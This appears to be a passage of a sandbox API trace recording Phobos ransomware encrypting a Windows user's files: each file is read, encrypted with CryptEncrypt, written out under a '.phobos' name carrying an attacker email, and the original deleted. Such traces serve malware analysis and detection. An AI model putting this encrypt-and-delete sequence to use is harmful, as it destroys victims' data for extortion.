[0192.426] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0192.426] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.426] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0192.426] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0192.426] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0192.426] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.426] CloseHandle (hObject=0x164) returned 1 [0192.426] CloseHandle (hObject=0x178) returned 1 [0192.426] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pfKR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pfkr.m4a")) returned 1 [0192.428] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sEBQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sebq.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.428] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=85387) returned 1 [0192.428] CloseHandle (hObject=0x178) returned 1 [0192.428] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sEBQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sebq.wav")) returned 0x2020 [0192.428] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sEBQ.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sebq.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sEBQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sebq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.429] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.429] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sEBQ.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sebq.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.429] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0192.429] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.429] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x14d8b, lpOverlapped=0x0) returned 1 [0192.444] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x14d90, dwBufLen=0x14d90 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x14d90) returned 1 [0192.445] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x14d90, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x14d90, lpOverlapped=0x0) returned 1 [0192.446] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0192.446] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.446] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0192.446] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.446] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0192.446] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.446] CloseHandle (hObject=0x178) returned 1 [0192.447] CloseHandle (hObject=0x164) returned 1 [0192.447] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sEBQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sebq.wav")) returned 1 [0192.448] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.512] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=32768) returned 1 [0192.512] CloseHandle (hObject=0x178) returned 1 [0192.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat")) returned 0x2026 [0192.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.513] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.513] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.514] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0192.514] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.514] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8000, lpOverlapped=0x0) returned 1 [0192.518] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010, dwBufLen=0x8010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010) returned 1 [0192.519] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8010, lpOverlapped=0x0) returned 1 [0192.520] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0192.520] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.520] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0192.520] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.520] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0192.520] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.521] CloseHandle (hObject=0x178) returned 1 [0192.521] CloseHandle (hObject=0x194) returned 1 [0192.521] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat")) returned 1 [0192.522] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.523] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=42495) returned 1 [0192.523] CloseHandle (hObject=0x194) returned 1 [0192.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip")) returned 0x2020 [0192.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.524] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.524] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.524] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0192.524] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.524] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xa5ff, lpOverlapped=0x0) returned 1 [0192.606] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa600, dwBufLen=0xa600 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa600) returned 1 [0192.607] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa600, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa600, lpOverlapped=0x0) returned 1 [0192.616] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0192.616] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.616] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0192.616] CryptDestroyKey (hKey=0xa32a68) returned 1 [0192.616] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0192.616] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.616] CloseHandle (hObject=0x194) returned 1 [0192.616] CloseHandle (hObject=0x178) returned 1 [0192.616] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip")) returned 1 [0192.617] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.618] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13) returned 1 [0192.618] CloseHandle (hObject=0x178) returned 1 [0192.618] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml")) returned 0x2020 [0192.618] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.619] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.619] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.619] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0192.619] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.619] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd, lpOverlapped=0x0) returned 1 [0192.620] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10, dwBufLen=0x10 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10) returned 1 [0192.620] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10, lpOverlapped=0x0) returned 1 [0192.621] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0192.621] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.621] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0192.621] CryptDestroyKey (hKey=0xa32a68) returned 1 [0192.621] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0192.621] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.621] CloseHandle (hObject=0x178) returned 1 [0192.621] CloseHandle (hObject=0x194) returned 1 [0192.622] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml")) returned 1 [0192.622] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.624] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13) returned 1 [0192.624] CloseHandle (hObject=0x194) returned 1 [0192.624] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml")) returned 0x2020 [0192.624] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.624] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.624] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.625] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0192.625] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.625] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd, lpOverlapped=0x0) returned 1 [0192.626] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10, dwBufLen=0x10 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10) returned 1 [0192.626] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10, lpOverlapped=0x0) returned 1 [0192.627] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0192.627] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.627] CryptEncrypt (in: 